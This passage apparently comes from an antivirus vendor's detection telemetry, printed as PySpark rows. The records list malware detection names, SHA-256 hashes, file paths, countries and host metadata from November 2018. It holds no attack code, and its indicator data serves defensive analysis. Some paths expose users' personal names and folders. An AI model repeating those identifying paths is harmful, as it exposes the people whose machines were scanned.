31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wscollect.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\WSCollect.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='07d15e34c5bbf07f87a525ff028c0b54c1c67f9f377e5d126bd2d77b9c018e02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:57:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goto.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\goto\\goto.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-02.04.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='09ee66de9f790357add011e76d2bebeded29b34233ad558946816266334a5cda', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30E1137F37F4C90814E8B85325D0453B172E8DF5E31C256975FE6225A448A358', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='46dc985b35875895cd1ddc67649095b0146f840d3d58087a07614b9a98baf85c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:23:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='--_-___----___----_-_-----____-__--__-_-__--_-.--_-___----___----_-_-----____-__--__-_-__--_-', filepath='h:\\\xa0\\--_-___----___----_-_-----____-__--__-_-__--_-.--_-___----___----_-_-----____-__--__-_-__--_-', filesize=6864000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='10ac37e8cf397d75ba149fa5725ccfaf6d01d5a316443e7f049acaa2933c5b81', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214842-0d85d996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-214842-0D85D996', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:48:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051708-843d386e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051708-843D386E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053921-9e52229f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053921-9E52229F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\Vape Cracked 2.47\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe31_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe31 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T16:34:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\services.exe', parentsize=333624, timestamp='2018-11-02T15:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\5C45B0E717EC785818796CCCD5EF52705BB98997101D8A414549F1E98A907441.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:54:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050306-8e38afb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050306-8E38AFB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055818-4469cd75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055818-4469CD75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061206-31e6d85f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061206-31E6D85F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054753-cf6f5be9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054753-CF6F5BE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000079a', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp0000079a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050315-93308702', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050315-93308702', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050328-9b600182', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050328-9B600182', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140823-0fec5361', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140823-0FEC5361', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gvmaszbi.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\GvMAsZbi.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085315-91aa4b10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba66ddae\\AVSCAN-20181102-085233-8B7F6E98\\AVSCAN-20181102-085315-91AA4B10', filesize=128000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='4f498247f5cf74378b9de7a5e03494c9fa1e4491c868c5ff318e82a7010eb68a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060120-b0e6a289', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060120-B0E6A289', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\C:\\Games\\Counter-Strike 1.6 CTapbIu\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\rhinoceros 6\\rhinoceros 6x folie3d\\rhino.6-patch\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T20:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061355-72eb41f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061355-72EB41F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061246-4993f8bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061246-4993F8BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051038-9b659478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051038-9B659478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051329-013f303d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051329-013F303D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052020-f6ad567e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052020-F6AD567E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061715-e9b9c55d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061715-E9B9C55D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052713-ec738351', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052713-EC738351', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052632-d4078bc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052632-D4078BC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051059-a7c695a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051059-A7C695A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060543-4d4a53e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060543-4D4A53E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053036-6580bf2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053036-6580BF2F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055612-f9428dec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055612-F9428DEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-2486ed1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-2486ED1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053524-11455393', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053524-11455393', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4f692e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4F692E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054929-089f1975', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054929-089F1975', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:27Z'), dt=datetime.date(2018, 11, 2)),
